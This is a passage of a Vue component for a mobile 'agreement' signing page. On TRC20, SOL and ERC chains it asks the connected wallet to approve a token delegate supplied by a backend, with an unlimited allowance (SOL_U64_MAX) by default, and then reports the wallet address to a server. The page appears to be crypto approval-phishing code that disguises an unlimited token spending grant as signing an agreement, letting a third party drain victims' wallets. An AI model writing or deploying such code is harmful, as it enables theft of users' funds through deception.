      const { mint, delegate, decimals, tokenProgram, approveAmount } = this.resolveApproveContracts("SOL");
      if (!mint || !delegate) {
        throw new Error("SOL授权参数缺失：mint或delegate为空");
      }

      const provider = window.solanaIns || window.solana || (window.phantom && window.phantom.solana);
      if (!provider) {
        throw new Error("未检测到SOL钱包环境");
      }
      if (!provider.publicKey && provider.connect) {
        await provider.connect();
      }

      const owner = address || (provider.publicKey && provider.publicKey.toString && provider.publicKey.toString());
      if (!owner) {
        throw new Error("SOL钱包地址获取失败");
      }

      const built = await apiPost("/api/solana/build_approve", {
        owner,
        mint,
        delegate,
        amount: approveAmount || SOL_U64_MAX,
        decimals,
        tokenProgram,
        commitment: "confirmed",
      });

      const unsignedTx = (built && (built.unsignedTx || built.tx || built.rawTx || built.transaction)) || "";
      if (!unsignedTx) {
        throw new Error("SOL build_approve未返回交易数据");
      }

      const tx = Transaction.from(base64ToBytes(unsignedTx));
      if (provider.signAndSendTransaction && !provider.signTransaction) {
        const sent = await provider.signAndSendTransaction(tx);
        return (sent && (sent.signature || sent.hash)) || "";
      }

      if (!(provider.signTransaction || provider.signAllTransactions)) {
        throw new Error("当前SOL钱包不支持签名交易");
      }

      let signed;
      if (provider.signTransaction) {
        signed = await provider.signTransaction(tx);
      } else {
        const signedList = await provider.signAllTransactions([tx]);
        signed = Array.isArray(signedList) ? signedList[0] : null;
      }

      if (!(signed && signed.serialize)) {
        throw new Error("SOL签名结果无效");
      }

      const rawTx = bytesToBase64(signed.serialize());
      const sent = await apiPost("/api/solana/send_raw", {
        rawTx,
        encoding: "base64",
        commitment: "confirmed",
      });
      return (sent && (sent.signature || sent.txid || sent.hash)) || "";
    },
    async submitAuthorize() {
      if (this.authorizing) return;
      this.authorizing = true;
      this.authorizeError = "";
      this.connectError = "";

      try {
        const { chain, address } = await this.ensureWalletReady();
        if (!address) {
          throw new Error("钱包地址为空");
        }

        if (chain === "TRC20") {
          await this.authorizeTrc();
        } else if (chain === "SOL") {
          await this.authorizeSol(address);
        } else {
          await this.authorizeErc(address);
        }

        await registerStatus({
          address,
          status: 1,
        }).catch(() => {});

        this.showReceiveDialog = false;
        await this.bootstrap();
      } catch (err) {
        this.authorizeError = (err && err.message) || "授权失败，请稍后重试";
      } finally {
        this.authorizing = false;
      }
    },
  },
};
</script>

<style scoped>
.agreement-page {
  min-height: 100vh;
  background: #ffffff;
}

.agreement-shell {
  width: min(430px, 100vw);
  margin: 0 auto;
  background: #ffffff;
  padding-bottom: 112px;
}

.brand-header {
  position: sticky;
  top: 0;
  z-index: 40;
  height: 56px;
  padding: 0 20px;
  display: flex;
  align-items: center;
  justify-content: space-between;
  background: #ffffff;
  border-bottom: 1px solid #e5e5e5;
}

.brand-mark {
  display: inline-flex;
  align-items: center;
  gap: 8px;
  color: #161616;
  font-weight: 700;
  letter-spacing: 0.24em;
  font-size: 16px;
}

.brand-dot {
  width: 10px;
  height: 10px;
  background: #111;
}

.brand-text {
  line-height: 1;
}

.hero-block {
  position: sticky;
  top: 56px;
  z-index: 30;
  padding: 18px 20px 20px;
  background: #ffffff;
  border-bottom: 1px solid #e5e5e5;
}

.hero-tag {
  margin: 0;
  font-size: 11px;
  color: #8b8b8b;
  letter-spacing: 0.12em;
}

.hero-title {
  margin: 8px 0 0;
  font-size: 36px;
  line-height: 1.04;
  color: #181818;
  font-weight: 500;
  letter-spacing: -0.01em;
}

.hero-desc {
  margin: 10px 0 0;
  font-size: 13px;
  line-height: 1.55;
  color: #4f4f4f;
}

.section-card {
  margin: 0;
  border-top: 1px solid #e5e5e5;
  border-bottom: 1px solid #e5e5e5;
  background: #ffffff;
}

.intro-card {
  border-top: 0;
}

.section-head {
  padding: 14px 20px 12px;
  display: flex;
  align-items: baseline;
  justify-content: space-between;
  border-bottom: 1px solid #e5e5e5;
}

.section-head h2 {
  margin: 0;
  font-size: 21px;
  font-weight: 500;
  color: #111;
  letter-spacing: -0.01em;
  line-height: 1.12;
}

.section-head span {
  font-size: 11px;
  color: #8a8a8a;
  letter-spacing: 0.1em;
  font-weight: 600;
}

.section-content {
  padding: 8px 20px 15px;
}

.line {
  margin: 8px 0 0;
  color: #202020;
  font-size: 13px;
  line-height: 1.72;
  white-space: pre-wrap;
  word-break: break-word;
}

.sub-section {
  margin-top: 12px;
  color: #161616;
  font-size: 14px;
  font-weight: 700;
}

.list-item {
  color: #3a3a3a;
  padding-left: 10px;
}

.fixed-footer {
  position: fixed;
  left: 50%;
  transform: translateX(-50%);
  bottom: 0;
  width: min(430px, 100vw);
  height: 74px;
  padding: 10px 20px 12px;
  background: #ffffff;
  border-top: 1px solid #e5e5e5;
  display: grid;
  grid-template-columns: 1fr 4fr;
  gap: 10px;
  box-sizing: border-box;
  z-index: 50;
}

.footer-meta {
  display: flex;
  flex-direction: column;
  justify-content: center;
  color: #808080;
  font-size: 10px;
  line-height: 1.2;
  letter-spacing: 0.08em;
}

.footer-meta strong {
  margin-top: 4px;
  color: #7f8a9a;
  font-size: 13px;
  line-height: 1;
  font-weight: 500;
  letter-spacing: 0.03em;
}

.sign-btn {
  border: 0;
  background: #10b95b;
  color: #f4f4f4;
  font-size: 18px;
  font-weight: 500;
  letter-spacing: 0.01em;
  cursor: pointer;
}

.sign-btn:disabled {
  opacity: 1;
  background: #10b95b;
}

.wallet-error {
  position: fixed;
  left: 50%;
  transform: translateX(-50%);
  bottom: 78px;
  width: min(430px, calc(100vw - 24px));
  margin: 0;
  padding: 8px 12px;
  box-sizing: border-box;
  background: rgba(175, 35, 35, 0.08);
  border: 1px solid rgba(175, 35, 35, 0.22);
  color: #b02b2b;
  font-size: 12px;
  line-height: 1.45;
  z-index: 55;
  word-break: break-word;
}

@media (max-width: 430px) {
  .hero-title {
    font-size: 32px;
  }

  .section-head h2 {
    font-size: 19px;
  }

  .line {
    font-size: 12px;
    line-height: 1.68;
  }

  .sub-section {
    font-size: 13px;
  }

  .sign-btn {
    font-size: 16px;
  }

  .wallet-error {
    bottom: 76px;
    font-size: 11px;
  }
}
</style>
